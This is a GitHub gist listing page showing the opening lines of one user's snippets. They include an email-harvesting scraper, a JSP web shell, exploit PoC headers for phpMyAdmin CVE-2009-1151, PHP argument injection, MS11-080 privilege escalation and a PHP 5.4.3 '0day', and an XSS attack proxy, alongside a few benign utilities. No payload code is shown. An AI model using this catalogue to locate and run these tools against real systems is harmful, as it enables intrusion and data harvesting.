Skip to content

Instantly share code, notes, and snippets.

@Thomas-23
Thomas-23 / google_email.pl
Created September 24, 2014 10:38
google 爬行 邮箱 脚本
#!/usr/bin/perl
#
# Google Email miner
# SensePost Research 2003
# roelof@sensepost.com
#
# Assumes the GoogleSearch.wsdl file is in same directory
#
$|=1;
use SOAP::Lite;
@Thomas-23
Thomas-23 / webshell1.jsp
Last active August 29, 2015 14:06
java web shell
<%@ page contentType="text/html; charset=GBK" language="java" import="java.sql.*,java.io.File,java.io.*,java.nio.charset.Charset,java.io.IOException,java.util.*" errorPage="" %>
<%
/**
* <p>Title:JspWebshell </p>
*
* <p>Description: jsp网站管理</p>
*
* <p>Copyright:绝对零度[B.C.T] Copyright (c) 2006</p>
*
* <p>Company: zero.cnbct.org</p>
@Thomas-23
Thomas-23 / phpMyAdmin_exploit.sh
Created September 24, 2014 09:37
phpadmin 设置 注入代码漏洞
#!/bin/bash
# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11
# by pagvac (gnucitizen.org), 4th June 2009.
# special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln,
# and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!
# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)
@Thomas-23
Thomas-23 / 5_3-5_4_exploit.rb
Created September 24, 2014 09:35
php 5.3.12 到 5.4.2 参数注入漏洞攻击
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
@Thomas-23
Thomas-23 / XPSP3_PSE.py
Created September 24, 2014 09:32
windows xp3 提权程序
################################################################################
######### MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit ########
######### Author: ryujin@offsec.com - Matteo Memelli ########
######### Spaghetti & Pwnsauce ########
######### yuck! 0xbaadf00d Elwood@mac&cheese.com ########
######### ########
######### Thx to dookie(lifesaver)2000ca, dijital1 and ronin ########
######### for helping out! ########
######### ########
######### To my Master Shifu muts: ########
@Thomas-23
Thomas-23 / bench_mark_order.py
Created September 24, 2014 09:30
排序时间衡量小程序
from random import shuffle, randint
import re
from sets import Set
def f1(seq): # Raymond Hettinger
# not order preserving
set = {}
map(set.__setitem__, seq, [])
return set.keys()
@Thomas-23
Thomas-23 / XSS-Proxy.pl
Created September 24, 2014 09:28
xss攻击代理
#!/usr/bin/perl
use IO::Socket;
# unbuffered output
$|=1;
# XSS-Proxy.pl
#
# Anton Rager - a_rager@yahoo.com
@Thomas-23
Thomas-23 / php5_4_exploit.php
Created September 24, 2014 09:26
php 5.4.3 Code Execution 0day
// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)
// Exploit author: 0in (Maksymilian Motyl)
// Email: 0in(dot)email(at)gmail.com
// * Bug with Variant type parsing originally discovered by Condis
// Tested on Windows XP SP3 fully patched (Polish)
===================
offset-brute.html
===================
@Thomas-23
Thomas-23 / client.py
Last active November 22, 2020 18:05
同步传输文件
#/usr/bin/python
#coding: utf-8
import socket
import time
import os
import sys
import struct
import threading
import Queue
@Thomas-23
Thomas-23 / sina.py
Created August 21, 2014 05:41
识别二维码
#!/usr/bin/env python
#coding:utf-8
import Image,ImageFont,ImageDraw,ImageFilter
import os,sys
from math import atan2,pi,sqrt
import cPickle as pickle
#import psyco
#psyco.full()